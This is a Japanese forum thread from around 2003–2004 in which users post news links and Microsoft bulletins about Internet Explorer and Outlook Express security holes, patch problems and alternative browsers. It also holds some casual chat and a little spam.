http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20031112/136355/

MS、WindowsとOfficeの脆弱性修正パッチリリース
http://www.zdnet.co.jp/enterprise/0311/12/epn05.html
米マイクロソフト、米祝日にセキュリティパッチをリリース
http://japan.cnet.com/news/ent/story/0,2000047623,20061917,00.htm

MS03-048 - Internet Explorer 用の累積的なセキュリティ更新 (824145)
http://www.microsoft.com/japan/technet/security/bulletin/MS03-048.asp
●影響を受けるソフトウェア
・Microsoft Windows 98 Second Edition
・Microsoft Windows Millennium Edition
・Microsoft Windows NT Workstation 4.0
・Microsoft Windows NT Server 4.0
・Microsoft Windows NT Server 4.0, Terminal Server Edition
・Microsoft Windows 2000
・Microsoft Windows XP
・Microsoft Windows XP 64 bit Edition
・Microsoft Windows XP 64 bit Edition Version 2003
・Microsoft Windows Server 2003
・Microsoft Windows Server 2003 64 bit Edition
●影響
リモートからのコード実行

>>1
選択肢

（１）Datula、Netscape7.1 Mail、Edmaxなどを使う

部バージョンの「Eudora for Windows」にバッファオーバーフ
ローの脆弱性
http://www.zdnet.co.jp/enterprise/0311/12/epn06.html

q824145.exe /q:a /r:n

これも出来たとはな　(´ー`) フッ

誤爆したぜ

IEにパッチを当てるとスクロール操作に不具合，パッチの品質に改めて注意が必要
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20031118/1/

スクロールバーの空白部分をクリックすると画面スクロールが正しく行われない
http://support.microsoft.com/default.aspx?scid=kb;ja;832270

IEに複数のセキュリティ・ホール，対策はアクティブスクリプトを無効にすること
ホールを突くデモ・ページが公開中，最新パッチを適用していても影響を受ける
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20031128/136983/

Internet Explorer System Compromise Vulnerabilities
http://secunia.com/advisories/10289/
Internet Explorerの新セキュリティホールは「極めて危険」
http://www.zdnet.co.jp/enterprise/0311/26/epi02.html

Opera:特定のMIMEタイプを持つデータがユーザーに無許可でダウンロード・実行される問題
http://jp.opera.com/cgi-bin/supsearch2.cgi?options=index&name=j104

最近のウイルス対策製品も IE の御世話になってるもの多い感じだけど
どうなの?

> 最近のウイルス対策製品も IE の御世話になってるもの多い感じだけど
> どうなの?

まぁ、Windows自体に依存してるからね…。

WindowsがIEにも依存してるし。　<= help等

>> 637

そうだねー。でも OS が web browser に依存しているというのは。
完全に逆なんじゃないのかなあ?

少なくともセキュリティー関連のものは独自の仕組で
アップデートとか出来た方が安心だと思うのは間違いだろうか。
だからといって完璧ではないだろうけど、若干ましな気がする。

IEを使い続けるリスクを再認識しよう
パッチには複数の不具合，パッチ未公開のセキュリティ・ホールが続出
今週のSecurity Check [Windows編]　（第108回，2003年12月3日）
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20031202/1/

IEにURLを偽装できるパッチ未公開の脆弱性が発見される
〜緊急度が低いため、パッチはまだリリースしない（MS取締役東氏）
http://internet.watch.impress.co.jp/cda/news/2003/12/11/1451.html

>>640
ちなみに、Opera7.23ja(3226)だとセキュリティ警告のダイアローグが出る。

IEにURLを偽装できるセキュリティ・ホール，安易なクリックは禁物
セキュリティ・ホールを確認するWebページやHTMLメールが公開
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20031211/137400/

ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/2003/12.html#20031211_IE

>>641
Opera6.06でも警告を確認。
これ、ある意味新ウイルスに使われそうなのに、マイクロソフトは危険度低なのね・・・

JokeVirusってどうやって解除するんですか？

@impoでcss読み込んじゃうなんて何考えてんだろうな

こんにちは。ＭＬＭ・ＮＢ初心者です。
詳しい方や現在もしくは過去ＭＬＭ・ＮＢをやられていた方の
ご意見が聞きたくてページ作りました。
よろしくお願いします。

つまらない物ですが、お礼の品も用意しておりますので
ぜひ、どうぞ！

　　　http://gonbea.fc2web.com/

IEに2種類の新たなセキュリティ・ホールが見つかる
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040110/138152/

月例パッチに含まれなかったIEの複数の脆弱性
http://www.itmedia.co.jp/enterprise/0401/14/epn15.html

解消されない“URLの偽装問題”，1月もIEのパッチは公開されず
Mozillaは最新版で対応完了，MDACのセキュリティ・ホールにも注意
今週のSecurity Check [Windows編]　（第110回，2004年1月21日）
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20040120/1/

URL偽装にご注意を！―Symantecのウイルス研究者が警告
http://itpro.nikkeibp.co.jp/free/NBY/NEWS/20040128/138984/

Microsoft plans to release a software update that modifies
the default behavior of Internet Explorer for handling user
information in HTTP and HTTPS URLs
http://support.microsoft.com/default.aspx?scid=kb;[LN];834489

IEに，ダウンロードするファイル名を偽装されるセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040129/139103/

>>652
もうなんでもありでつね

IEもうだめぽ

レベル緊急。

MS04-004 - Internet Explorer 用の累積的なセキュリティ修正プログラム (832894)

Internet Explorer 用の累積的なセキュリティ修正プログラム (832894) (MS04-004)
http://www.microsoft.com/japan/technet/security/bulletin/ms04-004.asp
2004 年 2 月のセキュリティ情報 (Windows)
http://www.microsoft.com/japan/technet/security/bulletin/winfeb04.asp

>>656
影響を受けるソフトウェア :
Microsoft Windows NTR Workstation 4.0 Service Pack 6a
Microsoft Windows NT Server 4.0 Service Pack 6a
Microsoft Windows NT Server 4.0 Terminal Server Edition, Service Pack 6
Microsoft Windows 2000 Service Pack 2, Service Pack 3, Service Pack 4
Microsoft Windows XP, Microsoft Windows XP Service Pack 1
Microsoft Windows XP 64-Bit Edition, Microsoft Windows XP 64-Bit Edition Service Pack 1
Microsoft Windows XP 64-Bit Edition Version 2003
Microsoft Windows ServerR 2003
Microsoft Windows Server 2003, 64-Bit Edition

テストした Microsoft Windows および Officeコンポーネント :
Internet Explorer 6 Service Pack 1
Internet Explorer 6 Service Pack 1 (64-Bit Edition)
Internet Explorer 6 Service Pack 1 for Windows Server 2003
Internet Explorer 6 Service Pack 1 for Windows Server 2003 (64-Bit Edition)
Internet Explorer 6
Internet Explorer 5.5 Service Pack 2
Internet Explorer 5.01 Service Pack 4

>>657
Windows 98(SE),Windows Meがないのは、影響がないのではなくて、
サポート終了に伴い評価の対象外になったため。
http://www.microsoft.com/japan/win98/98meExtend.htm
http://www.microsoft.com/japan/win98/98meextendfaq.htm
（有償サポート契約を結んでいない一般ユーザは、
　03年12月31日で98/Meのサポートは終了。）

>>658
>>657には98SE,MEはあがってないけど、個別のパッチのところには
98SE、MEもあがっていて適用可能だね。
http://www.microsoft.com/downloads/details.aspx?FamilyId=70530968-B59A-47C0-90D3-0C884910BC97&displaylang=ja
>システム要件
>サポートされているオペレーティング システム : Windows 2000 Service Pack 2, Windows 2000 Service Pack 3,
>Windows 2000 Service Pack 4, Windows 98, Windows 98 Second Edition, Windows ME, Windows NT, Windows XP
>この修正プログラムは、次のオペレーティング システム用の Internet Explorer に対して適用されます。
>Windows XP SP1
>Windows XP
>Windows Millennium Edition (Windows Me)
>Windows 2000 SP2
>Windows 2000 SP3
>Windows 2000 SP4
>Windows 98 SE
>Windows NT 4.0 SP6A

今回のパッチは良く考えてからｲﾝｽｺした方が良さげ
ｽｸﾛｰﾙはかちゅにも影響してるので直したいのだがｗ

IE 6の最新パッチにトラブル，記憶させたパスワードが表示されなくなる
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040203/139279/
MS04-004 Internet Explorer 6 Service Pack 1 用セキュリティ問題の累積的な修正プログラム
(KB832894)の適用後、記憶したはずのユーザー名とパスワードが表示されなくなる
ttp://support.microsoft.com/default.aspx?scid=http://www.microsoft.com/japan/support/sokuho/default.asp#Record_94

マイクロソフト，IEのセキュリティ・パッチを緊急リリース
URLの“偽装問題”を含む，3種類のセキュリティ・ホールを解消
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040203/139235/
MS、IEの脆弱性に対応の臨時パッチ
http://www.itmedia.co.jp/enterprise/0402/03/epc03.html
IE用の新パッチ発行で電子商取引に混乱の可能性も
http://www.itmedia.co.jp/enterprise/0402/02/epic01.html

そもそもブラウザに記録させるようなPASSに、
PASSの意味はあるのかあと小一時間は問い詰めない。

>>662ワラタ。

ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice

↓IEの脆弱の部分　下記のソフトで補うことが出来るんだろうか？
このソフト使っている人いたら　教えてね

BB de!!スマートブラウジング Ver.1　

Opinion：IE臨時パッチをめぐる混乱はなぜ起きたのか
http://www.itmedia.co.jp/enterprise/0402/10/epc17.html

漏えいしたWindowsのソースコードから早くもIE 5の脆弱性が発見される
〜リモートから任意のコードを実行可能。IE 6は影響なし
http://internet.watch.impress.co.jp/cda/news/2004/02/17/2118.html
マイクロソフト、複数の脆弱性を攻撃する手口が公開されていると警告
http://internet.watch.impress.co.jp/cda/news/2004/02/17/2125.html

流出したWindowsのソース・コードでIE 5のセキュリティ・ホールが見つかる
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040217/139945/
攻撃コードが既に出現，Windowsの“超特大”級セキュリティ・ホールを解説する
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20040217/1/

ソースコード流出がきっかけで指摘された新たなIEの脆弱性、その影響は？
Windows 2000とWindows NT 4のソースコードの一部がインターネットに流出したことが
明らかになってからわずか2日後、そのコードを元に、Internet Explorerの新たな脆弱
性が指摘された。
http://www.itmedia.co.jp/enterprise/0402/18/epn03.html

IEにパッチ未公開のセキュリティ・ホール，攻撃コードも出現している
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040220/140200/

IEのフレーム悪用でパスワード漏れ――iDEFENSEが警告
http://www.itmedia.co.jp/enterprise/0403/01/epic01.html

Windows XP Service Pack 2ベータ版プレビュー（パート2）後編
「Security Center」，IE，OEのセキュリティ機能
http://itpro.nikkeibp.co.jp/members/NT/WinNext/20040302/2/

>673
>Outlook ExpressはHTMLメールから身を守れる
>　MicrosoftはOutlook 2003において，HTML形式の電子メール内にある画像
>をブロックし，危険な可能性のある電子メールの添付物（例えば.exeという拡張
>子のファイル）を隔離するという，非常にニーズの高い安全対策を導入した。
>同社はXP SP2でこの機能をOutlook Expressに追加しようとしている。

>>673
>ブラウザのアドオン管理はよくできている
>　XP SP2のIEに追加される機能として，「Add-on Management」ツー
>ルがある。これはあなたがプラグインやツールバー，そのほかのご自
>分のシステムにインストールしたIEのアドオンを，リストの形で表示
>させたり，管理したりするのを手助けする。Add-on Managementツー
>ルは，私が知っているところでは，2つの基本機能を備えている。…

>IEの設定はスクリプトによる変更が不可に
>　さて，IEに対するセキュリティ面の変更はこれだけに終わらない。
>XP SP2では，IEのウインドウに対してスクリプトによって設定変更を
>加えるのを防げる。

　

URL偽装問題再び――IEとOutlookに
Internet ExplorerとOutlook Expressに、URL偽装が可能な新たな問題が存在することが判明した。
http://www.itmedia.co.jp/enterprise/0404/02/epn07.html

>>677
その上で右クリすれば見破れる。

いちいち右クリしなきゃならんのか…

HTMLメールをテキストで表示するようにしてれば大丈夫なのではないかと…

リンク先のURLを偽装できるセキュリティ・ホールがIEに，OEユーザーは特に注意
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040405/142470/

Internet Explorer showHelp() Restriction Bypass Vulnerability (secunia.com, 2004-03-29)
http://secunia.com/advisories/10523/
ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/#20040406_showHelp

>>680
それはﾏﾝﾄﾞｸｾ・・
でも、そうしないとヤバい？

Outlook 2003はOEとちがってプレビューしても安全でしょうか？

ｽﾏｿ
http://www.microsoft.com/japan/office/outlook/prodinfo/virus/olkscrty.asp
に書いてありました。

>>682
ノートンは"MHTMLRedir.Exploit"として検出するようだ。

>>682
それexploit公開されてる?
XPSP2だと発動しないのか再現に失敗してるだけなのか
確かめたいんだが

MS03-032が当たってれば問題ないのか
http://www.st.ryukoku.ac.jp/~kjm/security/memo/2004/04.html#20040407_tuiki

>>686
参考
MHTMLRedir.Exploit 発見日: 2003年12月11日 (米国時間)
http://www.symantec.com/region/jp/sarcj/data/m/mhtmlredir.exploit.html
>MHTMLRedir.Exploitは、悪意のあるWebサイトがユーザのコンピュータにプログラムをダウンロードし、
>実行することができるようにします。

Vendor Status Note JVNTA04-099A
Microsoft Internet Explorer に含まれる ITS プロトコルハンドラの脆弱性
http://jvn.doi.ics.keio.ac.jp/vn/JVNTA04-099A.html

W32/Bugbear-E
>ZIP 拡張子のある添付ファイルは、ベース64でエンコーディングされたワーム
>を持つ圧縮 HTMLを含み、HTML ファイルが開けられた時にワームが解読されて
>自動的に実行されるよう、 Microsoft Internet Explorer に関連するコードの
>脆弱性を利用しようとします。
http://www.sophos.co.jp/virusinfo/analyses/w32bugbeare.html

IEのパッチ未公開セキュリティ・ホールをUS-CERTなどが警告，複数の攻撃コードが出回っている
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040409/142701/

IE脆弱性を狙ったウイルスが登場、MSは「対策を進めている」
http://www.itmedia.co.jp/enterprise/0404/10/epn01.html
IEに脆弱性、完全な解決策は存在せず
http://www.itmedia.co.jp/enterprise/0404/10/epc02.html

これはヤバいかも・・・

===緊急===
MS04-013 - Outlook Express 用の累積的な修正プログラム (837009)
http://www.microsoft.com/japan/technet/security/bulletin/ms04-013.asp

Outlook Expressに「緊急」のセキュリティ・ホール，すぐにパッチの適用を
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040414/142886/

>>7

HTMLの表示　＞　ﾃｷｽﾄに変換して表示

>>197
ｾｷｭﾘﾃｨｰをするのに　無料と思ってる前提が糞でつ

2年前の投稿にレスつけられてもな・・・

>>688
問題あった
そこに書かれてるのはMS03-032とMS04-013を組み合わせた
攻撃が存在するということだけで、MS03-032を利用しない
攻撃も可能

パッチをあてる　と
アップグレードは意味ちがうのですか？

厳密にはな、まあ前後の文意から読め

つーか何の話だ

>>699
パッチをあてるは文字通りその穴に対する「つぎあて」。グレードはあがらないのが普通。

パッチ未公開のセキュリティ・ホールにも対応，最新版「IEを使い続けるための“お勧め”設定」
今までの“お勧め”設定では不十分，「マイ コンピュータ」ゾーンでもセキュリティ設定を
今週のSecurity Check [Windows編]　（第116回，2004年4月14日
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20040413/2/

ID詐取「フィッシング」を防止するIE向けツールバー，米EarthLinkが発表
http://itpro.nikkeibp.co.jp/free/ITPro/USNEWS/20040420/143274/

サイトー企画社の鶴亀メール バージョン 3.50 for Windows に
Buffer Overflow の問題を発見しました。悪意のある攻撃者は、
この問題を利用し 鶴亀メールを実行するユーザの権限で任意
のコードを実行できる可能性があります。
http://www.lac.co.jp/security/csl/intelligence/SNSadvisory/71.html

「危険なセキュリティ・ホールが複数，深刻度が『なし』から『緊急』に」
――4月のセキュリティ情報を解説する
“超特大”のセキュリティ・ホールが含まれる，相次ぐセキュリティ情報の変更に注意
今週のSecurity Check [Windows編]　（第117回，2004年4月21日）
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20040420/1/

セキュリティ・ホールを突くフィッシングが出現，キー・ロガーを仕掛ける
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040421/143365/
>今回のフィッシングが突くセキュリティ・ホールは，マイクロソフト
>が4月14日に公開したセキュリティ・ホールの一つ「MS04-013」であ
>る（関連記事）。このセキュリティ・ホールは「Outlook Expressに
>関するセキュリティ・ホール」とされているものの，正確には
>Outlook Expressに実装されている「MHTMLプロトコル・ハンドラ」の
>セキュリティ・ホールである。このため，Outlook Expressに限らず，
>Internet Explorer（IE）などで「mhtml」を含むURLにアクセスする
>場合には，このセキュリティ・ホールの影響を受ける。同社のセキュ
>リティ情報で「Outlook Expressを使っていなくても，Outlook Express
>がインストールされている環境ではパッチを適用する必要がある」と
>しているのはこのためである。つまり，「MS04-013」のパッチを適用
>していない環境において，偽のメール（フィッシング・メール）に記
>載されたリンクにIEでアクセスすると，キー・ロガーを勝手にインス
>トールされることになる。

Norton Internet Security 2004
圧縮ファイルもリアルタイムで監視可能だが、ONにすると重すぎ
スクリプト遮断機能がある
広告ブロックがアメリカ仕様で、お絵かき掲示板などの画像も消してしまう
スレに貼り付けてあるだけのウイルスコードに反応する
2chの過去ログ取得する時はFWを無効にしないといけない
Antispamが勝手にメーラーと統合する上に不安定（OEと相性が悪い？）
ポップアップ通知が鬱陶しい
LiveUpdateが遅い
ｗｅｂごとにスプリクト遮断やActiveX遮断やプライバシー制御の設定ができる
WEB閲覧するときHTMLファイルにスクリプトを埋め込む処理が重い
　（XPSP2ではデフォルトでポップアップ広告遮断機能があるので無駄になる）
回線速度が遅くなるという報告
ルールが適切ではないとの声もあるがPFWルールの自動作成が進んでいる
不正コピー・不正期限延長ユーザーが多い
個人情報を送ってるかについては疑惑は晴れず。
http://www.symantec.com/region/jp/products/nis/features.html
http://www.symantec.com/region/jp/products/nav/features.html

ウイルスバスター2004
圧縮ファイルもリアルタイムで監視可能だが、ONにすると重すぎ
FWレベル高にしないとアプリごとの制御ができない等、おまけ程度
スパイウェアの検出をするが削除は出来ない
迷惑メール検出の判定精度が悪い上に検出しても件名に[MEIWAKU]と付けるだけで意味がない
ユーザー登録しないとウィルス定義をUPできないので不正コピーユーザーは少ない
http://www.trendmicro.com/jp/products/desktop/vb/evaluate/features.htm

FWがしょぼい代わりに不具合が少ないバスターとFWにいろいろと機能が付いてる
代わりに不具合大盛りなNISって感じかな。
どちらもアンチウイルス機能自体には文句が出ないのは例年通り。

http://pc3.2ch.net/test/read.cgi/sec/1067918099/321

Eudoraに深刻なセキュリティホール
http://www.itmedia.co.jp/enterprise/0405/08/epc05.html

Outlook ExpressやEudoraなどに
ステータス・バーを偽装できるセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040511/143979/
>メール・ソフトOutlook Express／OutlookおよびEudoraに，
>リンクの飛び先を表示するステータス・バーを偽装できる
>セキュリティ・ホールがそれぞれ見つかっている。

>>709
ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/2004/05.html#20040511_ph
Opera7.23jaでは、釣られなかった。
http://www.st.ryukoku.ac.jp/~kjm/test/deep-sea-phishing.html

IEやOEの脆弱性を悪用し、リンクをクリックするだけで感染するウイルス
〜件名が「Re:」で本文に「yahoo.com」のリンクがある場合は要注意
http://internet.watch.impress.co.jp/cda/news/2004/05/12/3068.html

月例パッチの裏で取り残されたIE／Outlookの問題
http://www.itmedia.co.jp/enterprise/0405/12/epn08.html
マイクロソフトは5月12日、Windowsの月例パッチを公開したが、
一方でいまだ修正にいたらないIEおよびOutlook製品の複数の
セキュリティホールが報告されている。

Outlook 2003に危険度「中」の脆弱性
http://www.itmedia.co.jp/enterprise/0405/19/epc03.html

>>714
乙

>>708
脆弱性に対応した「Eudora 6.1.1」リリース
http://www.itmedia.co.jp/enterprise/0405/20/epc09.html

Microsoft Internet Explorer ImageMap URL Spoof Vulnerability
http://www.kurczaba.com/securityadvisories/0405132.htm
http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/bugtraq/2004.05/msg00206.html

Internet Explorer Local Resource Access and Cross-Zone Scripting Vulnerabilities
http://secunia.com/advisories/11793/

IEにパッチ未公開のセキュリティ・ホール，悪用するWebサイトが既に存在
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040609/145590/

IE6に任意のコードが実行可能な脆弱性、すでに悪用法が公開されている
〜6月の月例パッチでは、修正プログラムが提供されず
http://internet.watch.impress.co.jp/cda/news/2004/06/09/3420.html

JustSystem　Shurikenマンセー
独自ブラウザエンジンマンセー

IE に重大な脆弱性、MS は月例スケジュール外でも対応を検討
http://japan.internet.com/webtech/20040611/12.html

IEを悩ませる「4件」の脆弱性
http://www.itmedia.co.jp/enterprise/articles/0406/12/news009.html

IEやMozillaにアドレス・バーを偽装されるセキュリティ・ホール
IEではセキュリティ設定を回避される恐れあり
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040614/145800/

【新型ブラクラ】IE及び２ｃｈブラウザも注意！
http://qb5.2ch.net/test/read.cgi/operate/1087907963/l50

またもやOperaにアドレス・バーを偽装されるセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040622/146233/

IEの印刷機能にバグ，特定ページを印刷すると大量の印刷物が出力される
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040623/146295/

>>726
大量とは500枚以上らしい
IEでページを印刷する際、意図せずに500枚以上印刷してしまう不具合
http://internet.watch.impress.co.jp/cda/news/2004/06/24/3627.html

ウェブサイトにアクセスしただけで感染――IEユーザーに警告
http://www.itmedia.co.jp/enterprise/articles/0406/25/news051.html

一番良いのはIEもOEも使わないことなんだが…。
>>1の「建設的に」ってのは、「それを言うな」って意味なんだろうね？

んじゃ、勝手にすれば？

>>729
2年以上前の>>1に今更レスすることは全く建設的ではありませんね。

ﾜﾛﾀ

IIS/IEを攻撃するDownload.Jectに関与したロシアのWebサイトが閉鎖に
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20040629/4/
IEのライバルにチャンス到来――脚光浴びるブラウザセキュリティ
http://www.itmedia.co.jp/enterprise/articles/0406/29/news030.html

IEにセキュリティ・ホール，フレーム中に任意のコンテンツを表示させられる
有名企業のWebページに偽ページを埋め込むことが可能に
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040630/146625/

>>733
（(；ﾟДﾟ)ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

おかげさまでIE（含OE）は何でもありのブラウザまで進化しました。
この状況を希望しない方はFirefox若しくはOperaをご使用下さい。

( ﾟДﾟ)＜ﾎﾟｶｰﾝ

フレーム詐称の問題はIE以外のWebブラウザにも
http://www.itmedia.co.jp/enterprise/articles/0407/02/news015.html
Windows版のIE5.01／5.5／6に、フレームを悪用してWebサイトの偽装が可能な問題
が指摘されたが、Opera、Mozillaなど他のWebブラウザにも同様の問題が存在するこ
とが明らかになった。

これってIE3/4で一度は修正された穴でしょ。
どいつもこいつも三歩歩いたら忘れる学習能力ゼロの鳥頭ですか?

Download.Ject に関する情報
http://www.microsoft.com/japan/security/incident/download_ject.mspx
公開日: 2004年06月25日 | 更新日: 2004年07月03日 2:00

>>739
そこTechNetセキュリティにリンクがない＿|￣|○

これからは↓にしろってことか
http://www.microsoft.com/japan/security/default.mspx

と思ったらTechNetの一番上にはリンクあるのね

IEの“攻撃回避プログラム”は万全ではない，回避できない攻撃手法が公開されている
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040705/146831/

IE の脆弱性、いまだ存在との指摘
http://japan.internet.com/webtech/20040708/12.html

>>741と同じ内容ですね

OutlookとWordの組み合わせにセキュリティ・ホール，メール転送で任意のコードを実行させられる
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040712/147134/

IEコンポーネントではないが、使用者多そうなので。。。-

もう良いよ。疲れたよ。
非IE系ブラウザに乗り換えます。

IEに巨大なテキストファイルを表示するとクラッシュする脆弱性
http://internet.watch.impress.co.jp/cda/news/2004/07/13/3880.html

Outlook Express 用の累積的なセキュリティ更新プログラム (823353) (MS04-018)
http://www.microsoft.com/japan/technet/security/bulletin/ms04-018.asp

Outlook Explorer 6って…

「ポップアップ・ウインドウで画面表示を偽装できる」
――IEでファイルをダウンロードするときには注意
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040713/147187/

IEにパッチ未公開のセキュリティ・ホールが続出
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040714/147214/

》749
自動的にMozilla♪

》？？？？？？？？？？？？

OperaやMozillaのセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/ITPro/Security/20040728/147862/

セキュリティ・ホール

人間が作っているんだもんそんなの当たり前。
きっと完璧なコンピューターでロジックのあら捜ししたら、今見つかっている
5倍は見つかると思うよ。

===緊急===
MS04-025 - Internet Explorer 用の累積的なセキュリティ更新プログラム (867801)
http://go.microsoft.com/?linkid=771783
概要
リモートでコードが実行される可能性のある Internet Explorer の脆弱性を
修正するセキュリティ更新プログラムが公開されました。

「IEのセキュリティ・ホールは危険，公開されていない攻撃手法が存在する」――ラック
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040802/148057/

>>753
完璧なコンピューターって、なんじゃ？

またもやIEにアドレス・バーを偽装できるセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040817/148670/

もう何度目？　IEのアドレスバー偽装問題、再び
http://www.itmedia.co.jp/enterprise/articles/0408/17/news061.html

Operaだって1ヶ月に4回アドレスバー偽装が発見されたりしたじゃん

テスト結果
Internet Explorer v6.00 SP1 (6.00.2800.1106)では再現されました
Mozilla/5.0 Gecko/20040803 Firefox/0.9.3では再現されず

IEにセキュリティ・ホール，危険なファイルをダウンロードさせられる
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040819/148790/

リンク先を偽装する“偽シティバンク”からのメールに注意
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040823/148888/

Outlook Expressに「BCC」のアドレスを表示してしまう不具合
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040825/149044/

IEのドラッグ＆ドロップの脆弱性突いた攻撃が公に？
http://www.itmedia.co.jp/enterprise/articles/0408/26/news075.html?ec20

緊急報告！Windows XP SP2の全貌（第3回）
Internet Explorer/Outlook Express編
http://itpro.nikkeibp.co.jp/members/NT/WinSpecial/20040901/1/
>IEではActiveXコントロールのインストールやスクリプトによるファイルの
>自動ダウンロードなど，5つの事項について警告メッセージを表示するよう
>になっている。OEではHTMLメールの中の外部と張られたリンクなどは，むや
>みに読み込まないようになった。

IEのドラッグ＆ドロップの脆弱性を突くトロイの木馬「Akak」出現
http://www.itmedia.co.jp/enterprise/articles/0409/04/news002.html

===緊急===
MS04-028 - JPEG 処理 (GDI+) のバッファ オーバーランにより、コードが実行される (833987)
http://go.microsoft.com/?linkid=996596
概要 JPEG イメージ形式の処理に脆弱性が存在します。
影響 リモートでコードが実行される
影響を受けるソフトウェア・Windows、Office、Developer、Internet Explorer、他のソフトウェア
詳細な情報は、「影響を受けるソフトウェアおよびダウンロード先」をご確認ください。

XPのSP1だけど、Windows Updateサイトで確認してもMS04-028は出ません。
.NET Framework 1.1 Service Pack 1入れてあるからMS04-028は入れなくて
もいいんだろうか？
とりあえずしばらくは関連情報に注目しときます。

WindowsやIE，Officeなど複数のマイクロソフト製品に「緊急」のセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040915/149928/
Microsoft Officeにセキュリティ・ホール，WordPerfect文書でバッファ・オーバーフローの危険性
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040915/149927/

IEやMozillaなどにセキュリティ・ホール，なりすましを許す可能性あり
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040921/150222/

WindowsやIEなどのセキュリティホールを突くさらに危険なJPEGファイルが公開
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040924/150333/

セキュリティ・ホールを突くJPEGファイルの“作成ツール”が出回る
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040928/150524/

危険な“JPEGウイルス”出現間近，備えは万全ですか？
http://itpro.nikkeibp.co.jp/free/ITPro/OPINION/20040929/150576/
JPEG処理の脆弱性悪用画像、今度はAIMのプロフィールに
http://www.itmedia.co.jp/enterprise/articles/0409/30/news007.html
WindowsのJPEG処理脆弱性が、さらなる広がりを見せている。
AIMのプロフィールに問題の画像を添付するという手口が登場した模様だ。

初心者で申し訳ないのですが、質問させてください。
OEを使っているのですが、気付いたらアカウントの設定
（”サーバー”タブ内のSMTP欄）がいつのまにかlocal hostに変わっていました。
前はISPのSMTPサーバー名を入れてあったのに・・・。

これってどうしてでしょうか？

アンチウィルスソフトがメーラーを監視するためにlocalhostにして
中継している場合もあるよ。

>>775
有難うございます。
安心しました。

777get!!

IEでパスワードを含めたURLを使うと，ベーシック認証に失敗にする場合あり
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041004/150753/

広がるJPEG GDI+攻撃についての続報
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20041004/3/

===緊急===
MS04-038 - Internet Explorer 用の累積的なセキュリティ更新プログラム
(834707)
http://go.microsoft.com/?linkid=1187917

MS04-038 を適用して何か不具合出た方いらっしゃいます？
調べた限りでは

http://support.microsoft.com/default.aspx?scid=kb;ja;888051

以外に特に問題はなさそうなのですが…

MS04-038は、なさそうだね。

IEに2種類のセキュリティ・ホール，組み合わせるとXP SP2も影響を受ける
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041021/151548/

10月のセキュリティ・ホール，その後
http://itpro.nikkeibp.co.jp/free/ITPro/Security/20041027/151822/

IE 6.0 SP1 において URL を詐称するリンクが作成可能だ、という指摘。
ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/2004/10.html#20041029_URL
http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/bugtraq/2004.10/msg00345.html

開発者のプライドか、それとも「脆弱性」のネガティブイメージの影響か
ttp://d.hatena.ne.jp/HiromitsuTakagi/20041030#p1

IEのステータス・バーを偽装する手法が複数公開される
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041101/152016/
>米国時間10月28日以降，セキュリティ関連のメーリング・リストなどで，
>Internet Explorer（IE）のステータス・バーを偽装する手法（セキュ
>リティ・ホール）が複数公開されて議論を呼んだ。アクティブスクリプ
>トを無効にしていても偽装可能なので，IEを「制限付きサイト」ゾーン
>で利用するOutlook ExpressやOutlookといったメール・ソフトも影響
>を受ける。

次から次へと穴が見つかるのは何故？
1.シェアが高くて注目されてるから
2.もともと設計が糞だから
3.…

他のOS用のIE6SP2もリリースすべきヽ(`Д´)ﾉ

>>787
